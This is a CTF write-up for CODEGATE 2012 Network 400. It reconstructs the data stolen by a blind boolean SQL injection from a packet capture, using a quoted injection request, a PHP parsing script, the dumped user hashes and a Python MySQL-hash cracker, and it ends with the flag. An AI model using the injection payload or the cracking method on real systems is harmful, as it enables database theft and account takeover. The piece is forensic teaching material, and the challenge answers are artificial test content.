26 Feb 2012

CODEGATE 2012 – Network 400

Challenge Description

Because of a vulnerability in Company A's site, a database containing user information was leaked. The file is a packet dump taken at the moment of the attack.
Find the administrator's account information that was leaked from the site.
For reference, some parts of the packets were blinded to XXXX.

Answer : strupr(md5(database_name|table_name|decode(password_of_admin)))

So we get a PCAP file containing a rather nice SQL injection attack on a web application. As it turns out this is a blind, boolean-based injection, so the extracted data never appears in the responses and we can't simply read it out of the capture. Time to write a little tool..

Some assumptions can be made; a typical request from this attack looks like this:

GET /sc/id_check.php?name=music' AND ORD(MID((SELECT IFNULL(CAST(sex AS CHAR(10000)), CHAR(32)) FROM xxxxxx.XXXXXX LIMIT 10, 1), 2, 1)) > 8 AND 'aPafq'='aPafq HTTP/1.1

So we're mostly interested in the LIMIT offset (which row), the MID offset (which character of that row) and the comparison value. Extracting those is easy, but how do we determine the answer to each query? Looking at the Content-Length header of the response belonging to a request does the trick: on this target a body length of 4 means the injected condition was true, any other length means it was false.

Without further ado, our reverse-SQLi script 😉

<?php
// Pull every GET request carrying a LIMIT clause, plus the line after it (the
// Content-Length header of the matching response), out of the capture.
// strings/grep is crude but good enough here: the capture holds one request
// and one response per injected query, in order.
$out = explode("\n", urldecode(
    `strings 400.pcap | egrep "GET|Content-Length" | grep -A1 LIMIT`
));

$score = array();   // one entry per character the attacker extracted
$lastk = '';        // key (LIMIT count, MID offset, MID length) of the previous request
$req   = null;      // numeric fields of the GET request still waiting for its response

foreach ($out as $line) {
    if (substr($line, 0, 16) == "Content-Length: ") {
        if ($req === null)
            continue;                       // response without a request: skip
        $p   = $req;
        $p[] = trim(substr($line, 16));     // append the response length
        $req = null;

        // Keep only the last six numbers: LIMIT count, MID offset, MID length,
        // comparison value, the "11" from HTTP/1.1 and the Content-Length.
        $p = array_slice($p, -6, 6);

        // A change in (LIMIT count, MID offset, MID length) means the attacker
        // moved on to the next character: start a new score entry.
        $k = $p[0].$p[1].$p[2];
        if ($k != $lastk)
            $score[] = 0;

        // A 4-byte response means "ORD(...) > value" was true, so the character
        // is at least value+1; otherwise it is at most value. Every query for
        // the same character overwrites the entry, so the final bisection step wins.
        if ($p[5] == "4")
            $p[3]++;

        $score[count($score)-1] = $p[3];
        $lastk = $k;
        continue;
    }

    // A GET line (or a "--" group separator from grep -A1): strip everything
    // except digits and spaces, collapse whitespace and split into fields.
    $digits = trim(preg_replace('!\s+!', ' ', preg_replace('/[^0-9 ]/', "", $line)));
    $p   = explode(" ", $digits);
    $req = (count($p) < 6) ? null : $p;
}

// In this capture a final value of 1 only occurs for the probe past the end
// of a row (ORD('') is 0), so treat it as a newline between rows.
foreach ($score as $val) {
    if ($val == 1)
        $val = 0x0a;

    echo chr($val);
}
?>
$ php parse.php
7
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
3
monitor@cdgate.xxx
08b5411f848a2581a41672a759c87380
2
monitor
*1763CA06A6BF4E96A671D674E855043A9C7886B2
f
apple@cdgate.xxx
apple
3
apple
*C5404E97FF933A91C48743E0C4063B2774F052DD
m
music@cdgate.xxx
music
6
music
*DBA29A581E9689455787B273C91D77F03D7FAD5B
m
computer@cdgate.xxx
computer
2
computer
*8E4ADF66627261AC0DE1733F55C7A0B72EC113FB
f
com@cdgate.xxx
com
3
com
*FDDA9468184E298A054803261A4753FF4657E889
f
lyco@cdgate.xxx
lynco
4
*EEFD19E63FA33259154630DE24A2B17772FAC630
*0ECBFBFE8116C7612A537E558FB7BE1293576B78
f
mouse@cdgate.xxx
mouse
4
*87A5750BB01F1E52060CF8EC90FB1344B1D413AA
*6FF638106693EF27772523B0D5C9BFAF4DD292F1
m
root@cdgate.xxx
root
6
root
*300102BEB9E4DABEB8BD60BB9BB6686A6272C787
f
desktop@cdgate.xxx
desktop
1
desktop
*DDD9B83818DB7B634C88AD49396F54BD0DE31677
f
www@cdgate.xxx
4eae35f1b35977a00ebd8086c259d4c9
8
www
*3E8563E916A490A13918AF7385B8FF865C221039
f
notebook@cdgate.xxx
notebook
8
fb5d1b4a2312e239652b13a24ed9a74f
*18DF7FA3EE218ACB28E69AF1D643091052A95887
m

Nice! Now we have all the data the attackers retrieved. The *-prefixed 40-hex values in there are MySQL 4.1+ PASSWORD() hashes (SHA1 of SHA1 of the password, unsalted), so they are cheap to bruteforce offline. Some crunchtime later..

*DDD9B83818DB7B634C88AD49396F54BD0DE31677 = etagcd
$ php -r 'echo strtoupper(md5("cdgate|member|etagcd"));'
AB6FCA7FFC88710CFBC37D5DF9A25F3F
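The hash format and the final flag computation, as an added Python example (not the author's code): `mysql41_password` reproduces MySQL's 4.1+ PASSWORD() so a candidate password can be checked offline against a dumped hash, `crack` runs a wordlist through it, and `flag` applies the answer recipe from the challenge description. The four-word wordlist is constructed for the example; the target hash is the one from the dump above.

```python
import hashlib
import re
from typing import Iterable, Optional


def mysql41_password(plaintext: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' followed by uppercase hex of SHA1(SHA1(pw)).
    This is the format of the '*'-prefixed 40-hex values in the dump; there is
    no salt, so equal passwords always produce equal hashes."""
    inner = hashlib.sha1(plaintext.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def is_mysql41_hash(value: str) -> bool:
    """True for the '*' + 40 hex digit shape; the 32-hex values in the dump
    are something else and must not be fed to this cracker."""
    return re.fullmatch(r"\*[0-9A-Fa-f]{40}", value) is not None


def crack(target: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MySQL 4.1 hash equals target, else None.
    hashcat mode 300 (MySQL4.1/MySQL5) and John's mysql-sha1 format do the
    same computation at scale."""
    if not is_mysql41_hash(target):
        raise ValueError("not a MySQL 4.1+ hash: %r" % target)
    target = target.upper()
    for word in candidates:
        if mysql41_password(word) == target:
            return word
    return None


def flag(db: str, table: str, password: str) -> str:
    """strupr(md5(database_name|table_name|decode(password_of_admin)))"""
    return hashlib.md5(f"{db}|{table}|{password}".encode()).hexdigest().upper()


if __name__ == "__main__":
    TARGET = "*DDD9B83818DB7B634C88AD49396F54BD0DE31677"   # hash from the dump
    WORDLIST = ["password", "desktop", "cdgate", "etagcd"]  # constructed
    pw = crack(TARGET, WORDLIST)
    print("cracked:", pw)
    if pw is not None:
        print("flag:", flag("cdgate", "member", pw))
```

`mysql41_password` is checked against the example the MySQL manual gives for PASSWORD('mypass'); swap `WORDLIST` for a real dictionary (or hand the hash to hashcat/John) for anything beyond a toy run.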

Flag: AB6FCA7FFC88710CFBC37D5DF9A25F3F
